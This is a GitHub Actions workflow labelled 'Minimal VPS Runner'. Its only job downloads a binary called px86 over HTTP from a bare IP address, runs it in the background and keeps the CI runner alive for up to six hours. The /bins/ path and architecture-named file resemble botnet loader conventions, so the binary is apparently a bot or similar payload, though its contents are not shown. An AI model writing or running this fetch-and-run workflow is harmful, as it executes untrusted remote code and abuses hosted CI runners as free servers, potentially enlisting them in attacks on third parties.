name: Minimal VPS Runner

on:
  workflow_dispatch:
    inputs:
      uptime:
        description: 'VPS uptime in hours (max 6)'
        required: false
        default: '6'
        type: choice
        options:
          - '1'
          - '2'
          - '3'
          - '4'
          - '5'
          - '6'

jobs:
  run-binary:
    runs-on: ubuntu-latest
    steps:
      - name: Download and run binary with keep-alive
        run: |
          echo "🔽 Downloading binary..."
          wget http://45.138.16.158/bins/px86 -O px86
          chmod +x px86

          echo "🚀 Running binary in background..."
          ./px86 x86 &
          BINARY_PID=$!
          echo "📌 Binary PID: $BINARY_PID"

          # Convert hours to seconds
          UPTIME_SECONDS=$(( ${{ github.event.inputs.uptime }} * 3600 ))
          echo "⏳ Keeping runner alive for $UPTIME_SECONDS seconds..."

          # Heartbeat loop with output every 10 seconds
          END=$((SECONDS + UPTIME_SECONDS))
          COUNTER=10
          while [ $SECONDS -lt $END ]; do
            echo "💓 Runner heartbeat: $COUNTER seconds elapsed"
            sleep 10
            COUNTER=$((COUNTER + 10))
          done

          echo "⏱️ Time is up. Stopping binary (PID: $BINARY_PID)..."
          kill $BINARY_PID || echo "Binary already exited."
